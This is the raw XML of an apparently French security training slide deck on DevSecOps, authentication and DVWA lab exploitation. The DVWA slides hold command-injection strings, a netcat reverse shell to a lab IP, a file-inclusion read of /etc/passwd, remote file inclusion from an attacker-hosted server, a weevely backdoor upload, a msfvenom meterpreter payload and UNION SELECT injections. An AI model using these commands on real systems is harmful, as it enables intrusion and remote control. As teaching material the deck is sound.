      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="908445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29657A-4873-853E-1D68-A72C9C85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9813736" cy="553656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Injection SQL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AE64104-E157-868E-C388-FD2079F52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85698"/>
            <a:ext cx="6536724" cy="314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7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94DD5-88BD-DC40-76A7-08A6F8655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62DF42-0E3D-813D-9837-0AC213FC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9813736" cy="553656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Injection SQL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2D6E963-9E56-A746-A6BB-773336D0A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4241"/>
            <a:ext cx="12192000" cy="446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02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56929-507F-42FD-69D5-557218C7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Chaîne et requête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BFF29D-0210-1E81-5425-4F4DA6BEB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34FEBA-C40E-4EA4-0A16-1BD5FB0A8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2533814"/>
            <a:ext cx="12192000" cy="302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137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162B5-3944-2D9A-43EB-BC1F7CDB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Chaîne et requête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24EFED-8B63-CDA5-8979-53F09D29D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789974-B06E-FBEE-60D2-7BCD3911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887" y="1737360"/>
            <a:ext cx="10659762" cy="50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13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771A8A-B32D-DD7C-B9E4-918B008B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8664558" cy="467159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Injection (1)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3355B48-97F9-619D-436E-E06F44F5A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1" y="1681329"/>
            <a:ext cx="9205784" cy="4534119"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2286836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AD9D7-F818-6D65-DB9D-77F9F75EF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451E17-4DB2-36B8-9146-F44E4DD0F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8664558" cy="467159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Injection (2)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41BFB2B-724B-2547-C5D2-5A6D382BF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E846BE5-4809-F847-3F74-9EF492DD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" y="1075623"/>
            <a:ext cx="8664558" cy="578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400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A51215-618B-051B-A654-7128104F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SOLUTIONS CONTRE LES INJECTIONS SQL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1B0149-0F3E-E4FA-E65C-63F260310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ORM et Framework avec ORM pour SQLI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27369643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OWASP BRUTE FORCE ET INJECTION (DVWA)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5483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antérieure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Voir lien</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5661704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DVWA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admin</a:t>
            </a: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pasword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432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56069A-1518-7CBE-E2E2-149E8C52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Authentification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7EF70F-EECD-4308-9899-B99B8856A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d’authentification 1 : Stockage des mots de passes en clair (phishing)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d’authentification 2 : Utilisation de fonction de hachage + cryptage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d’authentification 3 : Délégation de sécurité (AWS)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2FA: Double Factor authentification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MFA : Multiple Factor Authentication (3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somethings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SSO : Single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Avec des protections du site web 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72143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Brute Force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wfuzz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burpsuite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(à faire)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8310807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Commande injection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Regarder OWASP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back end tester : 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 –c4 127.0.0.1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pipe : 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 –c4 127.0.0.1 |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474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INJECTION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741024" cy="41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13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LEVEL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 : | ou || ou &amp; ou &amp;&amp; ou ;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127.0.0.1;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127.0.0.1; cat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index.php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127.0.0.1;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whoami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hostname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ifconfig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,,/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127.0.0.1 &amp;&amp;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echo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hacked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00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LEVEL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netcat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revershell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 la machine attaquant : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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nlvp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1337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 l’entrée de la fenêtre web : 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127.0.0.1 ;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-e /bin/sh 192.168.32.130 1337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 se passe t-il pour medium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439673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FILE INCLUSION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http://192.168.80.134/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dvwa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vulnerabilities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/fi/?page=../../../../../../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passwd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76283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FCB0B3-DB19-AE56-B988-DC4AD345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RFI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CBE7C7-261A-112E-C3D3-F8F811533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7283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Remonter un fichier vers le serveur pour être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executé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via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php.include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775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838200" y="1690687"/>
            <a:ext cx="11353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-m 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http.server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9000</a:t>
            </a:r>
          </a:p>
          <a:p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Lancer : </a:t>
            </a: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192.168.113.132/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dvwa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vulnerabilities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/fi/?page=http://192.168.113.133:9000/up.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3599388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UPLOAD AVEC WEEVLY BACKDOOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510988" y="1690688"/>
            <a:ext cx="1137621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weevely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abcxyz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up.php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http://192.168.113.132/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dvwa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vulnerabilities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/../../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hackable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uploads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up.php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lang="fr-F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s’y connecter : </a:t>
            </a:r>
          </a:p>
          <a:p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weevely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http://192.168.113.132/dvwa/hackable/uploads/up.php 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abcxyz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588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75FF0F-EB92-7EC1-85A7-04E8963E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se fait </a:t>
            </a:r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le MFA?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426517-E3F8-84EC-4F27-E733E46FB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Something : Something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know,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something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something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92D5CF-1F13-9D4E-952C-4A1159BE5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349"/>
            <a:ext cx="3829050" cy="36099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4A21C02-F2C3-82F6-3800-2A01838B3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395" y="2814398"/>
            <a:ext cx="3226970" cy="316307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52938EE-E0B2-396C-ADD4-A7BE2C879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878" y="3137765"/>
            <a:ext cx="4300122" cy="283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077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2E7264F5-4E97-0FE9-B26F-6CD544C77297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8327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fichier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malvaillant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executé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 le serveur)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605117" y="1690688"/>
            <a:ext cx="1158688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Coté malware : </a:t>
            </a:r>
          </a:p>
          <a:p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msfvenom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-p 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meterpreter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reverse_tcp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LHOST=192.168.113.133 LPORT=4444 -f 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raw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up.php</a:t>
            </a:r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Coté </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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listener</a:t>
            </a:r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msfconsole</a:t>
            </a:r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exploit/multi/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handler</a:t>
            </a:r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meterpreter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reverse_tcp</a:t>
            </a:r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lport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4444</a:t>
            </a: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fr-F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lhost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192.168.113.133</a:t>
            </a:r>
          </a:p>
          <a:p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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4174859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AUTRES INJECTION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3100149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Injection DVWA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2020094"/>
            <a:ext cx="3695700" cy="13335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72" y="5016500"/>
            <a:ext cx="78581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86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Injection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1#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2#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3#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‘UNION SELECT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‘UNION SELECT user,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‘UNION SELECT user,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589" y="-12700"/>
            <a:ext cx="37147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749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INJECTION AMELIORATION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des modes inspections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developpeurs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sqlmap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burpsuite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OWASP ZAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37570398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Authentification (utilisation de MFA par 3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somethings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know,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ORM ou DBOO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12086265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9E2AEC-590F-6CF0-AEC5-F57DDE32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WAF (Installation dans le server)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5FB3B0-B92C-B7CC-59AF-CEEF587BD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928" y="1825625"/>
            <a:ext cx="11709918" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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https://www.linuxbabe.com/security/modsecurity-apache-debian-ubuntu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https://kifarunix.com/install-modsecurity-with-apache-on-ubuntu-22-04/</a:t>
            </a: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Tester : 127.0.0.1/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index.html?exec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=/bin/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bash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key : « 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ubuntu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WAF »</a:t>
            </a:r>
          </a:p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 un serveur VPS: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https//www.digitalocean.com/community/tutorials/apache-configuration-error-ah00558-could-not-reliably-determine-the-server-s-fully-qualified-domain-name </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18953614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WAF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byPASS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28759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9567" y="365125"/>
            <a:ext cx="12082071" cy="1325563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RESUMES EXPLOITATION DE VULNERABILITES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9995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D6DF0-DDED-F58A-BB4F-35BF5A51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CVE et CVS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C62D96-AEE6-00D8-8E9A-6452E145D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Confidentialité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Intégrité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Authenticité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Disfonctionnement ou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denied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service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RCE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utilisateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857991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12" y="154983"/>
            <a:ext cx="11131188" cy="65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36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3C4B21-B604-090D-B732-BD49CAD5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0-day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9A89E0-5EE0-C877-FFDE-D62059DF1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65950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1A94DF-1468-372C-4881-3F15DED8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Bug Hunting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20DBBC-B5D1-E5B5-546B-17D56915D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Plateforme de bug hunter :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fr-FR" dirty="0"/>
              <a:t>Orienté web : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hackerone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>integriti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>zerodium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> …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fr-FR" dirty="0"/>
              <a:t>Orienté système : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>zdi</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Réduction de prime : mutualisation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hunting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> privée (top du plateforme) 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8258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312"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="67821" y="464949"/>
            <a:ext cx="12124179" cy="624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4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2583</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>459</Paragraphs>
  <Slides>81</Slides>
  <Notes>40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Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Thème Office</vt:lpstr>
      <vt:lpstr>  DEVSECOPS Fédération d’identité  – Audit- - BugHunting  </vt:lpstr>
      <vt:lpstr>MOTS DE PASSES</vt:lpstr>
      <vt:lpstr>Combien de temps ?</vt:lpstr>
      <vt:lpstr>INSTALLATION de GESTION DE MOT DE PASSE</vt:lpstr>
      <vt:lpstr>Attaque de brutes forces</vt:lpstr>
      <vt:lpstr>Authentification</vt:lpstr>
      <vt:lpstr>Comment se fait le MFA?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DEMOS KEYCLOAK</vt:lpstr>
      <vt:lpstr>Phase de reconnaissance  Phase de l’exploitation Phase de post-exploitation  (CYBER KILL CHAIN)</vt:lpstr>
      <vt:lpstr>ON FACEBOOK CYBER SECURITY(KALI)</vt:lpstr>
      <vt:lpstr>Phase de reconnaissance </vt:lpstr>
      <vt:lpstr>Phase exploitation</vt:lpstr>
      <vt:lpstr>Outils de reconnaissance</vt:lpstr>
      <vt:lpstr>DEMOS : OUTILS RECON</vt:lpstr>
      <vt:lpstr>MACHINES VULNERABLES</vt:lpstr>
      <vt:lpstr>Prise en main de metasploit et metasploitable</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>Payload reverse  et binding  </vt:lpstr>
      <vt:lpstr>IMPACT EXPLOITATION</vt:lpstr>
      <vt:lpstr>EXEGOL</vt:lpstr>
      <vt:lpstr>EXPLOITATION : COMMENT CRÉER DES FAILLES ?</vt:lpstr>
      <vt:lpstr>DEMO OVERFLOW</vt:lpstr>
      <vt:lpstr>Injection SQL</vt:lpstr>
      <vt:lpstr>Injection SQL</vt:lpstr>
      <vt:lpstr>Chaîne et requête</vt:lpstr>
      <vt:lpstr>Chaîne et requête</vt:lpstr>
      <vt:lpstr>SQL Injection (1)</vt:lpstr>
      <vt:lpstr>SQL Injection (2)</vt:lpstr>
      <vt:lpstr>SOLUTIONS CONTRE LES INJECTIONS SQL</vt:lpstr>
      <vt:lpstr>OWASP BRUTE FORCE ET INJECTION (DVWA) </vt:lpstr>
      <vt:lpstr>Version antérieure </vt:lpstr>
      <vt:lpstr>DVWA</vt:lpstr>
      <vt:lpstr>Brute Force</vt:lpstr>
      <vt:lpstr>Commande injection</vt:lpstr>
      <vt:lpstr>COMMAND INJECTION</vt:lpstr>
      <vt:lpstr>LOW LEVEL PIPE : | ou || ou &amp; ou &amp;&amp; ou ;</vt:lpstr>
      <vt:lpstr>LOW LEVEL (netcat revershell)</vt:lpstr>
      <vt:lpstr>LOCAL FILE INCLUSION</vt:lpstr>
      <vt:lpstr>ACTIVATION RFI</vt:lpstr>
      <vt:lpstr>RFI</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>FILE UPLOAD AVEC WEEVLY BACKDOOR</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>AUTRES INJECTION</vt:lpstr>
      <vt:lpstr>SQL Injection DVWA</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL INJECTION AMELIORATION</vt:lpstr>
      <vt:lpstr>Protection </vt:lpstr>
      <vt:lpstr>WAF (Installation dans le server)</vt:lpstr>
      <vt:lpstr>WAF byPASS</vt:lpstr>
      <vt:lpstr>RESUMES EXPLOITATION DE VULNERABILITES</vt:lpstr>
      <vt:lpstr>Impact CVE et CVS</vt:lpstr>
      <vt:lpstr>0-day</vt:lpstr>
      <vt:lpstr>Bug Hunting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Sitraka</dc:creator>
  <cp:lastModifiedBy>Sitraka</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-13T18:08:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-14T04:28:05Z</dcterms:modified>
</cp:coreProperties>
</file>